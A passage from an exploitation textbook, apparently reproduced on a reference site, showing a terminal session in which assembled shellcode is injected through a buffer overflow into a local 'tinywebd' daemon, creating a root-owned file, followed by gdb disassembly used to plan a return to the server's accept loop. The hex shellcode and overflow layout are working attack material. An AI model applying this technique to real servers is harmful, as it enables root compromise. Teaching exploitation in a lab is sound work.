Graphics Programs Reference
In-Depth Information
The shellcode opens a file to create it and then immediately closes the
file. Finally, it calls exit to avoid an infinite loop. The output below shows this
new shellcode being used with the exploit tool.
reader@hacking:~/booksrc $ ./tinywebd
Starting tiny web daemon.
reader@hacking:~/booksrc $ nasm mark.s
reader@hacking:~/booksrc $ hexdump -C mark
00000000 eb 23 5b 31 c9 88 4b 07 6a 05 58 66 b9 41 04 31 |.#[1.K.j.Xf.A.1|
00000010 d2 66 ba 80 01 cd 80 89 c3 6a 06 58 cd 80 31 c0 |.f....j.X.1.|
00000020 89 c3 40 cd 80 e8 d8 ff ff ff 2f 48 61 63 6b 65 |.@..../Hacke|
00000030 64 58 |dX|
00000032
reader@hacking:~/booksrc $ ls -l /Hacked
ls: /Hacked: No such file or directory
reader@hacking:~/booksrc $ ./xtool_tinywebd_steath.sh mark 127.0.0.1
target IP: 127.0.0.1
shellcode: mark (44 bytes)
fake request: "GET / HTTP/1.1\x00" (15 bytes)
[Fake Request (15 b)] [NOP (357 b)] [shellcode (44 b)] [ret addr (128 b)]
localhost [127.0.0.1] 80 (www) open
reader@hacking:~/booksrc $ ls -l /Hacked
-rw------- 1 root reader 0 2007-09-17 16:59 /Hacked
reader@hacking:~/booksrc $
0x652
Putting Things Back Together Again
To put things back together again, we just need to repair any collateral damage
caused by the overwrite and/or shellcode, and then jump execution back
into the connection accepting loop in
main()
. The disassembly of
main()
in
the output below shows that we can safely return to the addresses
0x08048f64
,
0x08048f65
, or
0x08048fb7
to get back into the connection accept loop.
reader@hacking:~/booksrc $ gcc -g tinywebd.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disass main
Dump of assembler code for function main:
0x08048d93 <main+0>: push ebp
0x08048d94 <main+1>: mov ebp,esp
0x08048d96 <main+3>: sub esp,0x68
0x08048d99 <main+6>: and esp,0xfffffff0
0x08048d9c <main+9>: mov eax,0x0
0x08048da1 <main+14>: sub esp,eax
.:[ output trimmed ]:.
0x08048f4b <main+440>: mov DWORD PTR [esp],eax
0x08048f4e <main+443>: call 0x8048860 <listen@plt>
0x08048f53 <main+448>: cmp eax,0xffffffff
0x08048f56 <main+451>: jne 0x8048f64 <main+465>
0x08048f58 <main+453>: mov DWORD PTR [esp],0x804961a
